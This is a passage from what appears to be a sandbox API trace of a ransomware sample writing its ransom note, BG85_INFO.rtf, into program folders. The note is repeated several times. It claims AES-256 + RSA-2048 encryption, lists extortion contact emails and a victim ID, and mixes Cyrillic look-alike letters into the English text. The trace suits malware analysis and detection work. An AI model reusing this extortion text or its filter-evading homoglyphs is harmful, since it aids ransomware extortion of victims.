nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0136.012] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0136.013] CloseHandle (hObject=0x1f0) returned 1 [0136.013] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\bg85_info.rtf")) returned 0xffffffff [0136.014] GetLastError () returned 0x2 [0136.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.015] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.015] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with 